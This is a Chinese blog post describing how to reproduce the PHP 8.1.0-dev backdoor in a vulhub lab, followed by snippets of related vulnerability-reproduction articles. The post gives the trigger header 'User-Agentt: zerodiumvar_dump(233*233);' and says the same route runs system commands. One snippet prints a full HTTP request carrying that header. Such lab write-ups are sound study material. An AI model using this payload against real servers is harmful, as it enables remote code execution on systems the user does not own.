vulhub 8.1-backdoor漏洞复现

最新推荐文章于 2023-12-26 08:54:09 发布
最新推荐文章于 2023-12-26 08:54:09 发布
阅读量764 收藏 2
点赞数 1
CC 4.0 BY-SA版权
分类专栏: 漏洞复现
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_46804551/article/details/117306128
2021年3月28日,PHP 8.1.0-dev 版本被发现存在后门,允许攻击者通过User-Agent头执行任意代码。此漏洞允许恶意用户利用特定payload执行系统命令,威胁服务器安全。环境复现后,通过构造User-Agentt标头即可触发该漏洞。

摘要生成于 C知道 ,由 DeepSeek-R1 满血版支持, 前往体验 >

前言

PHP版本8.1.0-dev于2021年3月28日植入了后门,但很快发现并删除了该后门。当服务器上存在此后门时,攻击者可以通过发送User-Agentt标头执行任意代码。

复现

用vulhub搭好环境后
在请求头中构造如下payload

User-Agentt: zerodiumvar_dump(233*233);

在这里插入图片描述
执行系统命令:
在这里插入图片描述

PHP-8.1.0-dev 后门命令执行漏洞复现
m0_48520508的博客
06-16 2273
0x00漏洞描述 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 0x01影响范围 PHP 8.1.0-dev 0x02环境搭建 1、本次环境搭建使用vulhub中的docker环境搭建,vulhub环境下载地址: https://github.com/vulhub/vulhub 2、下载完成后发送到安装有docker和docker-compose环境的虚拟机中,进入漏洞环境目录 c
vulhub漏洞复现30_Jetty
weixin_44193247的博客
02-04 4018
vulhub漏洞复现练习篇
vulhub thinkPHP5 SQL注入&&敏感信息泄露漏洞复现
weixin_53696027的博客
05-22 940
关于vulhub中thinkPHP SQL注入的漏洞复现及其简单的原理介绍
vulhub靶场-CVE-2021-41277 Metabase 信息泄露漏洞复现
m0_54323635的博客
08-02 414
CVE-2021-41277 Metabase 信息泄露漏洞复现
PHP 8.1.0-dev 后门远程命令执行漏洞(vulhub)
X_IT666的博客
07-28 1429
漏洞介绍 关于漏洞:PHP 8.1.0-dev 后门远程命令执行漏洞 PHP verion 8.1.0-dev的PHP在服务器上运行,则攻击者可以通过发送User-Agentt标头执行任意代码。 影响版本:PHP 8.1.0-dev 配置环境: 靶机:centos8 攻击机:kali 其他:vulhub -->php–>8.1-backdoor 漏洞攻击思路: 扫描端口,确定开启的服务,漏洞寻找,漏洞利用 信息收集 nmap扫描端口 访问http://192.168
ms17-010 漏洞复现-主要用来学习交流
qq_30302577的博客
12-12 4969
ms17-010 漏洞复现-主要用来学习交流(32位系统) 目录: 文章目录ms17-010 漏洞复现-主要用来学习交流(32位系统)一.漏洞原理1.简介2.漏洞原理代码详解二.漏洞复现1.目标信息收集2. 尝试攻击2.1. 查看漏洞模块 search ms17-0102.2. 可以先使用辅助模块来扫描测试 auxiliary/scanner/smb/smb_ms17_0102.3 使用攻击模...
Tomcat任意文件写入(CVE-2017-12615)漏洞复现
weixin_45540609的博客
07-28 2209
一、漏洞原理 影响范围:pache Tomcat7.0.0-7.0.81(默认配置) 如果配置了默认servlet,则在9.0.1(Beta),8.5.23,8.0.47和7.0.82之前的所有Tomcat版本都包含所有操作系统上的潜在危险的远程执行代码(RCE)漏洞,CVE-2017-12615:远程代码执行漏洞。只需参数readonly设置为false或者使用参数readonly设置启用WebDAV servlet false。此配置将允许任何未经身份验证的用户上传文件(如WebDAV中所使用的).
工具介绍-the-backdoor-factory(第九课).docx
09-15
2. 进入 The Backdoor Factory 项目的目录,使用命令 `cd the-backdoor-factory`。 3. 使用 `./backdoor.py` 命令来生成Payload,并将其植入到可执行文件中。 4. 使用 `-f` 选项指定要植入的可执行文件,使用 `-S` ...
Simple-Backdoor:一个简单的python 2 server-client命令控制后门
04-04
在Simple-Backdoor-main文件中,我们可以看到实现这些功能的具体Python代码。通过阅读和理解代码,我们可以学习如何使用Python进行基本的网络编程,以及如何处理命令行输入和输出。 请注意,创建和使用此类后门必须...
记一次vulnhub|渗透测试Literally-Vulnerable
crispr的博客
01-22 858
vulnhub Literally-Vulnerable 0X01 Main Point 1.针对wordpress框架开发的wpscan的基本使用 2.PWD环境变量提权 3.搭建SSH,密钥登陆 4.得到低权限shell的各种姿势 5.kali自带的dirb扫描网站目录 (字典真香) 0X02 前期嗅探和端口探测 kali终端arp-scan -l得到靶机的IP:172.20.10...
PHP-8.1.0-dev 后门命令执行漏洞复现_zerodiumvar_dump
最新发布
资深程序员,曾自学JAVA,C#,如今从业于网安行业
12-26 745
如果你也想学习:黑客&网络安全的SQL攻防。
php-8.1.0 开发版后门复现
lionwerson的博客
06-02 748
1
PHP 8.1.0-dev 开发版本后门事件
EC_Carrot的博客
07-18 557
漏洞背景 PHP 8.1.0-dev 版本在2021年3月28日被植入后门,但是后门很快被发现并清除。当服务器存在该后门时,攻击者可以通过发送User-Agentt头来执行任意代码。 漏洞复现 发送如下数据包,可见代码var_dump(233*233);成功执行: GET / HTTP/1.1 Host: localhost:8080 Accept-Encoding: gzip, deflate Accept: */* Accept-Language: en User-Agent: Mozilla/5.0
vulhub漏洞复现51_PHP
weixin_44193247的博客
02-11 1066
vulhub漏洞复现练习篇
vulhub-spring漏洞复现
qq_51922767的博客
09-14 3028
vulhub-spring漏洞复现
Kali 搭建Vulhub靶场 (详细)
qq_43508668的博客
04-21 1739
这里写目录标题安装Docker安装pip安装docker-compose下载Vulhub 安装Docker 检查软件更新 apt-get update 安装https协议、CA证书 apt-get install -y apt-transport-https ca-certificates 安装docker apt install docker.io docker -v 查看是否安装成功 启动docker systemctl start docker 显示docker信息 docker ps -
vulhub漏洞靶场搭建
Kevin's Blog
07-19 9389
文章目录一、简介二、安装2.1 环境介绍2.2 安装docker2.3 安装docker compose2.4 下载Vulhub三、启动环境3.1 启动docker3.2 互ping测试3.3 启动环境 一、简介   Vulhub是一个基于docker和docker-compose的漏洞环境集合,进入对应目录并执行一条语句即可启动一个全新的漏洞环境,让漏洞复现变得更加简单,让安全研究者更加专注于漏...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值